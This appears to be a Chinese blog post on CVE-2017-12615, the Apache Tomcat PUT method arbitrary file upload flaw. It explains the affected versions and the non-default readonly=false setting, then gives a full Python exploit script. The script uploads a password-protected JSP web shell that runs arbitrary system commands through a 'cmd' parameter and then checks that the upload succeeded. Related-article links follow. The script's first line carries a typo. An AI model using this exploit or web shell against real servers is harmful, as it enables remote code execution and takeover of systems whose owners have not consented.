CVE-2017-12615 Tomcat PUT方法任意写文件漏洞

简介: CVE-2017-12615 Tomcat PUT方法任意写文件漏洞

漏洞简介

2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)

当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。

漏洞的产生是由于配置不当(非默认配置),将配置文件(

conf/web.xml)中的readonly设置为了false,导致可以使用PUT方法上传任意文件,但限制了jsp后缀,不过对于不同平台有多种绕过方法

漏洞复现

对根目录进行抓包

mport requests
import sys
import time
'''
Usage:
  python CVE-2017-12615.py http://127.0.0.1
  shell: http://127.0.0.1/201712615.jsp?pwd=fff&cmd=whoami
'''
def attack(url):
  user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
  headers={"User-Agent":user_agent}
  data="""<%
    if("fff".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>"""
  try:
    requests.put(url, headers=headers, data=data)
    time.sleep(2)
    verify_response = requests.get(url[:-1], headers=headers)
    if verify_response.status_code == 200:
      print 'success!'
    else :
      print verify_response.status_code
  except :
    "error"
if __name__ == '__main__':
  target_url = sys.argv[1] + '/201712615.jsp/'
  attack(target_url)
  print 'shell: ' + target_url[:-1]

pwd是密码,脚本里面可以修改,cmd是执行的命令

相关文章
|
1月前
|
Java 应用服务中间件
解决tomcat启动报错:无法在web.xml或使用此应用程序部署的jar文件中解析绝对的url [http:java.sun.com/jsp/jstl/core]
解决tomcat启动报错:无法在web.xml或使用此应用程序部署的jar文件中解析绝对的url [http:java.sun.com/jsp/jstl/core]
132 1
|
8月前
|
SQL 关系型数据库 MySQL
CentOS部署JAVA程序、安装Tomcat以及安装导入mysql文件的方法
CentOS部署JAVA程序、安装Tomcat以及安装导入mysql文件的方法
|
5月前
|
Unix 应用服务中间件 Linux
Tomcat清理日志文件无法立即释放磁盘空间
Tomcat清理日志文件无法立即释放磁盘空间
|
10月前
|
Java 应用服务中间件
用IDEA创建servlet文件并用Tomcat运行
用IDEA创建servlet文件并用Tomcat运行
135 0
|
11月前
|
安全 Java 应用服务中间件
干货 | Tomcat漏洞复现总结
干货 | Tomcat漏洞复现总结
567 0
|
11月前
|
安全 前端开发 网络协议
中间件常见漏洞之Tomcat
中间件常见漏洞之Tomcat
343 0
|
11月前
|
安全 Java 应用服务中间件
tomcat的put方法任意文件写入漏洞浅谈
tomcat的put方法任意文件写入漏洞浅谈
206 0
QGS
|
11月前
|
容器
浅谈Tomcat9之Servlet-request获取请求参数及常用方法
//获取Map集合中所有的key Enumeration<String> getParameterNames();
QGS
115 0
|
安全 Java 应用服务中间件
从一个被Tomcat拒绝的漏洞到特殊内存马
从一个被Tomcat拒绝的漏洞到特殊内存马
143 0
从一个被Tomcat拒绝的漏洞到特殊内存马
|
JSON 供应链 安全
Apache Tomcat 存在 JsonErrorReportValve 注入漏洞(CVE-2022-45143)
Apache Tomcat 存在 JsonErrorReportValve 注入漏洞(CVE-2022-45143)
Apache Tomcat 存在 JsonErrorReportValve 注入漏洞(CVE-2022-45143)